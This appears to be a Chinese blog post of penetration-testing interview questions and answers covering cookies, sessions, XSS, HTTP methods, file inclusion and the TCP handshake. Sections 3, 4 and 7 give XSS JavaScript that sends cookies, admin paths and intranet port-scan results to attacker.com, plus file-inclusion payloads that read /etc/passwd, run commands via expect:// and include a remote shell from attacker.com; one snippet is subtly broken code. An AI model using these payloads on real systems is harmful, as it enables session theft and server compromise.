2025年渗透测试面试题总结-102(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

[🍪 1. Cookie属性详解](#🍪 1. Cookie属性详解)

[🔄 2. Cookie vs Session](#🔄 2. Cookie vs Session)

[🎯 3. 通过XSS获取Cookie后定位后台](#🎯 3. 通过XSS获取Cookie后定位后台)

[⚡ 4. 后台在内网时的XSS高阶利用](#⚡ 4. 后台在内网时的XSS高阶利用)

[🌐 5. HTTP请求方法及安全影响](#🌐 5. HTTP请求方法及安全影响)

[🔧 6. 核心专长领域](#🔧 6. 核心专长领域)

[📂 7. 无上传点的文件包含漏洞利用](#📂 7. 无上传点的文件包含漏洞利用)

[💻 8. 网络与系统原理掌握深度](#💻 8. 网络与系统原理掌握深度)

[🤝 9. TCP三次握手与标志位](#🤝 9. TCP三次握手与标志位)

复制代码
1、xss通常是用来获取cookie,关于cookie,你了解多少,有多少属性。
2、cookie和session有什么区别
3、假设有这样一个情景,你通过xss可以拿到管理员cookie,你如何知道后台在哪里
4、如果后台在内网里,你无法登录,那么你该怎么办。如何更大效率的利用这个xss
5、HTTP请求方式
6、擅长哪一块
7、有一个网站,存在文件包含漏洞。但是没有上传点。如果是你会怎么利用
8、网络原理,和系统原理这边你怎么样
9、tcp三次握手,标志位

🍪 1. Cookie属性详解

属性 作用 安全意义
HttpOnly 阻止JS通过document.cookie 读取 防御XSS窃取Cookie
Secure 仅通过HTTPS传输 防止网络嗅探
SameSite 控制跨站请求携带(Strict/Lax/None 防御CSRF
Domain 定义Cookie生效域名(如.example.com 允许子域名) 避免越域访问
Path 限制Cookie路径作用范围(如/admin 缩小攻击面
Expires/Max-Age 设置过期时间 控制会话生命周期
Partitioned 限制Cookie在分区存储(新兴属性) 防御Spectre等旁路攻击

🔄 2. Cookie vs Session

维度 Cookie Session
存储位置 客户端(浏览器) 服务端(内存/数据库)
安全性 低(可直接查看修改) 高(仅ID暴露)
生命周期 可长期保存 通常随浏览器关闭失效
性能影响 无服务端负担 需服务端存储和检索
典型场景 记住登录状态 敏感操作(如支付验证)

🎯 3. 通过XSS获取Cookie后定位后台

实战步骤:

  1. Cookie分析

    复制代码
    Javascript

    // XSS Payload提取管理员Cookie中的路径信息 fetch('https://attacker.com/log?cookie=' + document.cookie);

    • 检查Cookie中的Path属性(如Path=/admin
  2. 历史记录探测

    复制代码
    Javascript

    // 读取浏览器历史记录中可能的后台路径 for (let path of ['/admin', '/manage', '/wp-admin']) { if (history.indexOf(path) > -1) fetch('https://attacker.com/log?path='+path); }

  3. 页面链接扫描
    注入脚本遍历页面所有链接,匹配关键词:

    复制代码
    Javascript

    Array.from(document.getElementsByTagName('a')) .map(a => a.href) .filter(url => /admin|manage|backend/.test(url)) .forEach(url => fetch('https://attacker.com/log?url='+url));


⚡ 4. 后台在内网时的XSS高阶利用

当无法直接登录后台时的策略:

复制代码
Mermaid

graph TB A[XSS持久化] --> B[内网探测] A --> C[权限提升] B --> D[端口扫描] B --> E[服务指纹识别] C --> F[键盘记录] C --> G[钓鱼覆盖]

具体方法:

  • 内网资产测绘

    复制代码
    Javascript

    // 扫描内网常见服务 const ports = [80,443,8080,3306]; ports.forEach(port => { fetch(`http://192.168.1.1:${port}`, {mode: 'no-cors'}) .then(() => fetch(`https://attacker.com/log?ip=192.168.1.1&port=${port}_open`)) });

  • 反向代理建立
    注入代码创建WebSocket隧道,将内网流量转发至公网

  • 钓鱼覆盖攻击
    篡改页面内容伪造登录框,诱骗管理员输入二次认证凭证

  • 浏览器漏洞利用
    结合XSS触发浏览器0day(如CVE-2024-XXXX)获取系统权限


🌐 5. HTTP请求方法及安全影响

方法 用途 安全风险
GET 获取资源 URL参数暴露/缓存投毒
POST 提交数据 CSRF/参数污染
PUT 上传文件 任意文件上传漏洞
DELETE 删除资源 未授权资源删除
OPTIONS 探测服务器支持的方法 暴露敏感接口信息
TRACE 回显请求内容 导致XST(跨站追踪)攻击
PATCH 部分更新资源 逻辑漏洞导致数据篡改

🔧 6. 核心专长领域

网络安全三维能力矩阵:

复制代码
Mermaid

pie title 技术能力分布 "Web漏洞攻防" : 35 "内网渗透" : 30 "安全开发" : 25 "漏洞研究" : 10

  • Web漏洞攻防:精研SQLi/XSS/SSRF利用链构造及WAF绕过
  • 内网渗透:熟悉域渗透框架(ADIDNS/黄金票据)及隐蔽隧道
  • 安全开发:具备EXP工具链开发能力(Python/Go)

📂 7. 无上传点的文件包含漏洞利用

四大突破路径:

  1. PHP伪协议利用

    复制代码
    Url

    ?file=php://filter/convert.base64-encode/resource=/etc/passwd ?file=expect://id

  2. 日志注入攻击

    • 修改User-Agent为恶意代码
    • 包含日志文件:?file=/var/log/apache2/access.log
  3. 临时文件竞争

    复制代码
    Php

    // 结合文件上传临时文件竞争 ?file=/tmp/phpLTE0aG // 爆破临时文件名

  4. 远程协议加载

    复制代码
    Url

    ?file=http://attacker.com/shell.txt ?file=ftp://user:pass@attacker.com/cmd.php


💻 8. 网络与系统原理掌握深度

核心知识框架:

领域 掌握要点
网络协议 TCP/IP协议栈(三次握手/四次挥手)、ARP欺骗防御、DNS劫持检测
操作系统 Linux权限模型(SUID/SELinux)、Windows访问控制链(ACL)、进程注入技术
攻防对抗 防火墙绕过(分片重组)、IDS检测规则分析、内存攻击(堆喷射/ROP链)

🤝 9. TCP三次握手与标志位

交互流程:

复制代码
Mermaid

sequenceDiagram Client->>Server: SYN=1, Seq=x Server-->>Client: SYN=1, ACK=1, Seq=y, Ack=x+1 Client->>Server: ACK=1, Seq=x+1, Ack=y+1

标志位解析:

  • SYN:同步序列号(请求建立连接)
  • ACK:确认数据有效(响应请求)
  • RST:强制断开连接(异常处理)
  • FIN:正常结束连接(四次挥手)
  • PSH:要求接收方立即处理数据
  • URG:标识紧急数据(与URG指针配合)

安全关联:

  • SYN洪水攻击:伪造大量SYN包耗尽服务端资源
  • ACK扫描:通过响应判断主机状态(防火墙绕过)
相关推荐
用户9623779544816 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机19 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机19 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户9623779544821 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star21 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
DianSan_ERP6 天前
电商API接口全链路监控:构建坚不可摧的线上运维防线
大数据·运维·网络·人工智能·git·servlet
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全